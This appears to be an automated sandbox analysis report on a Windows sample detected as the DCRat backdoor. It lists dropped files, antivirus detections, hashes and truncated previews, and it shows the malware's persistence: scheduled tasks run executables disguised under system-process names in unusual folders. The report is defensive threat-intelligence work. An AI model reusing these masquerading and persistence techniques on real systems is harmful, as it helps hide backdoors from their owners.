            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562033 Sample: c62q1qZ8kX.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus detection for dropped file 2->54 56 12 other signatures 2->56 9 c62q1qZ8kX.exe 3 6 2->9         started        12 mmeUVmNHPOdst.exe 2->12         started        15 fontdrvhost.exe 3 2->15         started        17 2 other processes 2->17 process3 file4 46 C:\...\chainMonitor.exe, PE32 9->46 dropped 48 C:\blockrefSessionBrokerDll\5sVJrvWE.vbe, data 9->48 dropped 19 wscript.exe 1 9->19         started        68 Multi AV Scanner detection for dropped file 12->68 signatures5 process6 signatures7 58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->58 22 cmd.exe 1 19->22         started        process8 process9 24 chainMonitor.exe 3 26 22->24         started        28 conhost.exe 22->28         started        file10 38 C:\Users\Public\Pictures\mmeUVmNHPOdst.exe, PE32 24->38 dropped 40 C:\Users\Default\mmeUVmNHPOdst.exe, PE32 24->40 dropped 42 C:\Users\Default\...\mmeUVmNHPOdst.exe, PE32 24->42 dropped 44 8 other malicious files 24->44 dropped 60 Antivirus detection for dropped file 24->60 62 Multi AV Scanner detection for dropped file 24->62 64 Machine Learning detection for dropped file 24->64 66 3 other signatures 24->66 30 schtasks.exe 24->30         started        32 schtasks.exe 24->32         started        34 schtasks.exe 24->34         started        36 26 other processes 24->36 signatures11 process12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            c62q1qZ8kX.exe59%VirustotalBrowse
            c62q1qZ8kX.exe100%AviraVBS/Runner.VPG
            c62q1qZ8kX.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\7-Zip\Lang\TextInputHost.exe100%AviraHEUR/AGEN.1323984
            C:\blockrefSessionBrokerDll\5sVJrvWE.vbe100%AviraVBS/Runner.VPG
            C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
            C:\blockrefSessionBrokerDll\chainMonitor.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exe100%AviraTR/Dropper.Gen
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\nfAOklRSeu.bat100%AviraBAT/Delbat.C
            C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%Joe Sandbox ML
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%Joe Sandbox ML
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%Joe Sandbox ML
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe100%Joe Sandbox ML
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Lang\TextInputHost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exe100%Joe Sandbox ML
            C:\blockrefSessionBrokerDll\chainMonitor.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exe100%Joe Sandbox ML
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe100%Joe Sandbox ML
            C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exe76%VirustotalBrowse
            C:\Program Files\7-Zip\Lang\TextInputHost.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\7-Zip\Lang\TextInputHost.exe76%VirustotalBrowse
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe76%VirustotalBrowse
            C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\mmeUVmNHPOdst.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\mmeUVmNHPOdst.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\Pictures\mmeUVmNHPOdst.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\blockrefSessionBrokerDll\chainMonitor.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechainMonitor.exe, 00000004.00000002.1801910999.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              No contacted IP infos
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1562033
              Start date and time:2024-11-25 05:51:10 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 8s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:43
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:c62q1qZ8kX.exe
              renamed because original name is a hash value
              Original Sample Name:11DA048860021B6C22E171032E48B023.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@39/28@0/0
              EGA Information:
              • Successful, ratio: 16.7%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 360
              • Number of non-executed functions: 107
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): Conhost.exe, conhost.exe, TextInputHost.exe
              • Excluded domains from analysis (whitelisted): a1053620.xsph.ru, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target chainMonitor.exe, PID 6192 because it is empty
              • Execution Graph export aborted for target fontdrvhost.exe, PID 3592 because it is empty
              • Execution Graph export aborted for target fontdrvhost.exe, PID 4444 because it is empty
              • Execution Graph export aborted for target mmeUVmNHPOdst.exe, PID 2148 because it is empty
              • Execution Graph export aborted for target mmeUVmNHPOdst.exe, PID 6556 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              04:52:16Task SchedulerRun new task: conhost path: "C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe"
              04:52:16Task SchedulerRun new task: conhostc path: "C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe"
              04:52:16Task SchedulerRun new task: fontdrvhost path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
              04:52:16Task SchedulerRun new task: fontdrvhostf path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
              04:52:16Task SchedulerRun new task: mmeUVmNHPOdst path: "C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe"
              04:52:16Task SchedulerRun new task: mmeUVmNHPOdstm path: "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"
              04:52:16Task SchedulerRun new task: TextInputHost path: "C:\Program Files\7-Zip\Lang\TextInputHost.exe"
              04:52:16Task SchedulerRun new task: TextInputHostT path: "C:\Program Files\7-Zip\Lang\TextInputHost.exe"
              04:52:19Task SchedulerRun new task: Idle path: "C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe"
              04:52:19Task SchedulerRun new task: IdleI path: "C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe"
              04:52:19Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe"
              04:52:19Task SchedulerRun new task: WmiPrvSEW path: "C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe"
              No context
              No context
              No context
              No context
              No context
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):180
              Entropy (8bit):5.7409532916271315
              Encrypted:false
              SSDEEP:3:WuiXZww6HAUkP44QiC/JpdpB/CJ3PXUjeN9FOoH2jXTqtG2jVOq6wguxn:Wui+nHJXX/JbpJK3/UOF6oGaVOJwln
              MD5:4822D6359C0504E5016C604B4ED1F142
              SHA1:B5CEE90B4CAD269A88FF609E36AE6B42A3F23273
              SHA-256:89B6D05E2709AF387E262BE347D4FEAA50677D6ED1019C5E72CEB549B8611F58
              SHA-512:94BE7023F11B3CF6278516D4DC07075DA8924460E938D37D6A36F2CC217F90920FC894C6F33481AD7B9865811C9F7283B2D8C80A1C7B37B275708911D3A0D858
              Malicious:false
              Preview:s4KcP2Sa8KilC3BUiQPQaoNmUC9bPupHeeTXKEDqjsqixfELWWnwmuuDqhHN20LOeaGhjoKeNjqs7ozy8yE2H3ftuPqm6zxshcEWZglsMJjCECFBrTPEwSGk5XxT7hhXv7KfkcZbMVp8TdpsJo4mkt6OVdbCtRuplMQG1kbP4x1amIRcrEKT
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              • Antivirus: Virustotal, Detection: 76%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.14693314801683788
              Encrypted:false
              SSDEEP:24:bp8Tv06Xfg0AqSa08/KNmBmZ2gtzMPCechk8Sgwj7Dn:ybBX0RaF/KIBmZjtzF/hCgwj7
              MD5:C2B428243D89BAE93D4D63857B6AF12B
              SHA1:F56D0B1A4E71F26CE73CE6C54891C68C030976CA
              SHA-256:B646989B74689737BFFBCDCF4EFBD21BB48B52EA2AE0B7943B3DD9199B5CC001
              SHA-512:8F3802BBD56EC464E70D9D428263FF8F05434A2732CA7EC38A020C50DD9F3EDD49F8C74F2739591D104D827821C8C8074FD604A1B1B431C4DE368D237F72F8F3
              Malicious:false
              Preview:NlQI2sp8o7Zg2tMir7roKc1ve0xQ9D2IBtmS4VVuc8UXs2IQLNo0IyguufnB5Z9kEReIH4nWl7LLIeClsgEvZB9MN1iZrTzD9uSaY9IRkSPLnUmPcCTYUNLDSR5PVOpRIIMXLmNsXxLGwyj2PS7pAaswjPIGE35Vm7DeIOEzylAgBEQdsDADQARrZay6eHoe20ezvEuAOH0YZLve8oXA22EmpVFrZHVq7foKkbsnT9yJJ3SNpT7ztnm9v1JZ9ClGvKb3hk4g5ur3D5cwC1CFJg6T3oZsSSoRYsX9bZqEZb396t5zYXWI9f6PNH92KMOnGaeVhdUnL8qsm6XKsjT55gR3vIvTZx3MNQ3fOkS5Ct6ByNmQuyKl3TrkIljZsAOYEefWD26IRY2MjQEhfejkmST3jTWmA2MBei6UsQN12BUfaeA2gC3NanvwLlxtfTIYL1sATuzPQsrl8xcESeG899k0xKJGdeWj35Ujw9iwNn6s6KxXIsaANKZMQ1NIlswwVIrCd3ST6TuVC14nWw8uDWVtgHT4wZLe1JXxcv3PaHE3ZDKY6kwzuBt8x7gVjXggIQe2eHKl2sU5ScUc748MnWuzaYAeOhpCkhvIjR4zZK6BrxqUnEYoZU3wfocFHpWVCRVuqL2qAIwcZsImrp1KJAnQo8n5zystxl8Zc6obLroQhaWwgzXbxML.................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):851968
              Entropy (8bit):6.059509469218102
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:67C628F5E4AD720822BD25865F0D1015
              SHA1:6E8ECC563B4C69AAFF803B3C56D77C2E38A117E3
              SHA-256:754E654B04029867090D8DD9D6AA650284F8C854A15111C820B4B71365175D52
              SHA-512:50ACA0454350941DA8D2C47DD656942D73AF02DACA57F8366AC840C44F85E62C760134CA0AE651C4490C72AB5EC2C4774C890DA2FEBF53437FEEC5F625316DFB
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):211
              Entropy (8bit):5.675798157024419
              Encrypted:false
              SSDEEP:3:f4WTggEgskiEtiAa6V/HXn575uGf3k8yKjq4IxrLyB/lBkpocCoKAPcZpTayqCPn:gWsgEg1Ha43F57vk54q12KC5AkTTTNn
              MD5:E91F684824F03C66E65C78463C51BD04
              SHA1:5FE0587B8DABB4D072011004F126236952A0D090
              SHA-256:3E6450614A338875FAC394B5DE0DB69F3A5662EC5B38DFF7DF48A3F6009DDA73
              SHA-512:F42B8043A791C96C84F7219B416F5106BF8DD4FDA652EA217CC78401149318CF44A9FEB2FCB423D9B77C99961F7564DCE1D9D778CFCCA16E71E1DB7EB715176D
              Malicious:false
              Preview:A3KzHMi9mbIRYc6UssqbGsoXw9ks9YLE44Sdb9WoZdNTjAq4T9tSANGROwDHmz9OPEWeKd2tWBCmeVxvSpZ9p3DrxAOo6OBjd9DfoMu0HA59Kew39Rz7aAiWAoqJONwH9cIfRSHF5i1p7EhTNVppZEJdare9glm3Ny9rWRmqJtC1I3Y6HX53hGr5ToFjyIjU68bIEz66s9fpBRUgTi1
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              • Antivirus: Virustotal, Detection: 76%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with very long lines (565), with no line terminators
              Category:dropped
              Size (bytes):565
              Entropy (8bit):5.840878319506011
              Encrypted:false
              SSDEEP:12:0EzIHbeJdHwqdcVEAbdSfgUrfRXDj8eF8nwriR1uLoLgqa1Nn:/E7eJBwqdcV3SoyvZriR1uLo2Hn
              MD5:F8E92F97122CED54963F1381E5005FE6
              SHA1:86FB3E1F0A6BA1F391D4B685001B7285ED86516F
              SHA-256:881DE1A264EA8D7CDCD189C60C6EE8272A7523C754637111F33D75A9AC2B6A3B
              SHA-512:9A80623697829DB279ACC8F6242078FD368A7968ECB512B43C804146A3412D92485D7B04E43601C195C892DF4EC02ACAEF436BAE355CD8E6DD4058C654791E3C
              Malicious:false
              Preview:ZyHAYV0WPUmNQgbVK78S8ijPaYdGpWUk50nGAKgs9kmTcaFZybRvkok0O2jA1tq3ACRZ3VVAbQSY6Qw9SESOFi9QQw2Hkf0P4tSaIqfdGQUUWM48FkswacycDAJGcNa5ZCdM7W1mjzHyNo4E23CAxDyb50WHgYA20Z5TsrBtsGNlU9OYGEOjLaHVNCRG9tFKzO8ytlWL2SRr0NG5m8BbKaraRjFpZ4t9ADvFBapfsCr2IafA5WeBrn9YhigJfqv7iRqwbA3LSgsHtyR1EFuDZsSWEWid3g9CRuT1tti4cSsK41psQoFa5rh09UsEcaSwhq08eZIVgzlHAHbMq0MPaiGjMd2YAdcBA5nOAqN0ft4FGaz12fXlOCV9kRwBhuUDXjGEeNLAnVtroAcvoAgfF0x8koot4MTvZ1shUvXpUX82SoUjyAWgNz7gvIezibFbC8RxS5b2n1Lr25p5TF53zwhj3MvLRhG2ShzUXhR2ie3WoPn0digdgMlQar3GKQlGuSZVFUivxCUU2K5ni5ssAmWF5j3poLsS3xmV0RuIAvqd1RXQwPhPh
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              • Antivirus: Virustotal, Detection: 76%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):121
              Entropy (8bit):5.6478904605873055
              Encrypted:false
              SSDEEP:3:EX4oxp8frHfVMVLXJXptzMfnrghtmK4ODDj:BfTiVZBM874ODf
              MD5:55609D3CB4E4B9F9490FEE9DBDB8C06A
              SHA1:07533B99CEA252EB6E4BAFF7C6A3DD8419FBDAD8
              SHA-256:E056ADB5C05C4838E5F6C7964DD46C35BA2394485AEBB2842FF52026B9AD3CA8
              SHA-512:34FA84BBA67FA9233C2D13A03BC8D638CB843CCD2865C65060273E9FD0F50DD45C4FD2740ACFB997D3B1F5FBA63D98A336E5C8BDD941A565B9C5609C6A6EF283
              Malicious:false
              Preview:mUBbFijxQKkrP63OoLn2YndvAsdZg1OqHoDIzzSrMcRE7KzMDFwUyAs90QaXFKQY53kl2uYy36p6VYxz2RVbE42G5ESjY4mCM2JEkNTTr8a1UwnbdlexzzUAA
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):250
              Entropy (8bit):5.783896601928897
              Encrypted:false
              SSDEEP:3:GfRMMvhtSUwe9/uPQnbzWKI8m0K1uXVxAKZqj8Vbx1CLdEOQMyVVBbWOjT6VtPkG:GrUu/AQnby/aPF6IVV5W+SPJW9LRdVQL
              MD5:21C3E433D81E45CF15EBAA8BF32FAB27
              SHA1:3CCC6599A0DC160246C7EBF3DE7EDF8E1D36306E
              SHA-256:31EEBCFA5A3F03A781049F37755C8E1A9FEA449757F9CD1EE8E329FF4C3B78B2
              SHA-512:CC13B928F075B824FF5BE44604DB03E225FB0EE7380058EAB77DE7A780A8AFD6EA45E5E29756A6E3A0B7C9652EE200C6CA8CE35725FE2E75DD3F5684B8A5E8BB
              Malicious:false
              Preview:o8CtGeAwJa0FxZyMWiJDHhe12ibhrCKMuWzzxFNg9rgXltljfaX4FpHGdK1hCcEGQnVbj9ZQVmDZBGQI71CQoPHEOsVmOpdgmZH7XJ9fAGjdlrFW3skKaybAgRN0owCpJhxl9Svx2hPipncgn8sfESGx7GbG6I1ND3UE4eXl7xS2j3V2yrNpEhk0a9n21o0upBevTYmIkHiRANOEviSP4LJgSdn40fuS6iMhZjiZFEE68T0MvjGSWlzd17
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with very long lines (952), with no line terminators
              Category:dropped
              Size (bytes):952
              Entropy (8bit):5.907308514382015
              Encrypted:false
              SSDEEP:24:QXSbigG15FKfQ8vL0qEqMREjnBxFtto5+QCob6IeFqhG:McEYfQ8T0kMRoDto5+YWlt
              MD5:B18B9AC9D857340ACC4FE02C9096DDDB
              SHA1:D58BEAF47C18A2A54DAAF052723AA2AF39FA6727
              SHA-256:30410F01A5B5CCB761A763763ED2B935C100CE2C39B5592B06B7DE9AC30ED03E
              SHA-512:C98193DA861E734E6E56F7919324F0F5AD6F4ACF010A3295D4291647EC9B866635832517EA192CF80D47C09F2CE07FFAEA0DAD5CB73936C18FCFDD085A1D5D31
              Malicious:false
              Preview:z0xC4LsO0LBwfPbQm4CM0a6x8HVtmNalvOch2ZlUDLoavfENd9dokhGY39Dwz9lmvaBRx4XMTsJpwgCcDIPntvANHDo2VyeEjBpUexZjlQV2YamX7ltrt739ZyJtQe1fNEFv0r8QtpCcaHzrbR5uExUlIq4qnpTGZzpTV0gPnd7D5aiS8cS8iGaaudnJxSmDW5CkcfVkuqHlzQqrImrKXUhTZPj1NXcU03r9X7zdGrO19ykdx5BKkbqCYtLN6eXXOwu6jqUKwOEpGpTkoFDRVRtYNplnvmgmT1mMEo4Gl0XWXA6sZki1aFB7CWs4EqYKrcWOCHgAL6qf3XAMt3OLDpLOzpJr59C5bMo5orpSEiqdZfDpVgLLbNHCQIYX7yFL4uDqsFiBO5Hf8ryTmeWYy0dNFlpgSRUPceiocW6Q8J6fGmDiTFvdbqWDR0lGaBt6l1CdIK1PhGap47HdiGNNg1xwIeWlv0z6ZA4OkkaINf5VPrJTsIiUygZtDPVoxQerQeP3C238qE9A5cgaUD2mRfH2kLLUOvV7BOEvbQR0PknugZxlt4TuX1ZuWWT1rit4tC9rYu9EwCXr1XWLXjkTckkKzTZE6ZJq0tBeZGM85O8Vdr28AHeH8abIcz2FV4HW2r0IW1vRXmXOmPqHaaEz5CsaS2BkOHmBGlcw1umIVNtVCNgNIuo40Sbz9Zzd0KDP9WHAw3Ppx5dsSWYFWycdcrLyKmxb4JSKJdVpFfbPf9H4ythmBuGCsjxRLT0JGyunnSiyBs91XN8dkQ9aFKaKCQckqDewoRIrOdRfLslSvPpflTr5TZE5XklW08I7ONMFEQOH8dPWjHYxk68WWicOMMTo24pMknEhDjbUFj60KrWQLxv49vkpv7327kODyCw5C1tBenRwmlEezCcEIuNzDYwGpjXeV2CH5aNUEuZWdxDJ2ZC5IK5Dz62o
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
